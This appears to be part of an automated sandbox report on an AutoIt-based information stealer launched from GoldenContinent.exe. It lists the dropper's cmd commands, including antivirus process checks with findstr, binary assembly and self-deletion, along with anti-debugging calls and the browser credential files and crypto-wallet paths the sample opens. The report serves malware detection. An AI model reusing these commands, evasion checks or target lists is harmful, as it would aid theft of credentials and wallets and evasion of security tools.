                Source: C:\Windows\SysWOW64\timeout.exe TID: 7900Thread sleep count: 85 > 30Jump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C5DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00C5DC54
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C6A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00C6A087
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C6A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00C6A1E2
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C5E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00C5E472
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C6A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00C6A570
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C666DC FindFirstFileW,FindNextFileW,FindClose,10_2_00C666DC
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C2C622 FindFirstFileExW,10_2_00C2C622
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C673D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00C673D4
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C67333 FindFirstFileW,FindClose,10_2_00C67333
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C5D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00C5D921
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00BF5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00BF5FC8
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\523266\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\523266Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: Relationship.com, 0000000A.00000002.2594436163.0000000004190000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Relationship.com, 0000000A.00000002.2593745021.0000000001864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C6F4FF BlockInput,10_2_00C6F4FF
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00BF338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00BF338B
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C15058 mov eax, dword ptr fs:[00000030h]10_2_00C15058
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C520AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,10_2_00C520AA
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C22992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00C22992
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C10BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00C10BAF
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C10D45 SetUnhandledExceptionFilter,10_2_00C10D45
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C10F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00C10F91

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: Relationship.com PID: 7576, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C51B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00C51B4D
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00BF338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00BF338B
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C5BBED SendInput,keybd_event,10_2_00C5BBED
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C5ECD0 mouse_event,10_2_00C5ECD0
                Source: C:\Users\user\Desktop\GoldenContinent.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Jam Jam.cmd & Jam.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 523266Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "landing" Ca Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Existing + ..\Lower + ..\Wants + ..\Elvis + ..\Distribution xJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\523266\Relationship.com Relationship.com xJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\523266\Relationship.com" & rd /s /q "C:\ProgramData\8Y5XTR16XLN7" & exitJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C514AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_00C514AE
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C51FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00C51FB0
                Source: Relationship.com, 0000000A.00000000.1702606674.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp, Gnu.0.dr, Relationship.com.1.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Relationship.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C10A08 cpuid 10_2_00C10A08
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C4E5F4 GetLocalTime,10_2_00C4E5F4
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C4E652 GetUserNameW,10_2_00C4E652
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C2BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,10_2_00C2BCD2
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 10.2.Relationship.com.43f0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2598479689.00000000043F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1986763504.00000000018A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1986800119.00000000043FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1986740506.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2594230702.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2593745021.0000000001864000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Relationship.com PID: 7576, type: MEMORYSTR
                Source: Relationship.com, 0000000A.00000002.2598479689.000000000459C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Exodus\
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: info.seco
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                Source: Relationship.com, 0000000A.00000002.2598479689.000000000459C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                Source: Relationship.com, 0000000A.00000002.2598479689.000000000459C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: MultiDoge
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: seed.seco
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                Source: Relationship.comBinary or memory string: WIN_81
                Source: Relationship.comBinary or memory string: WIN_XP
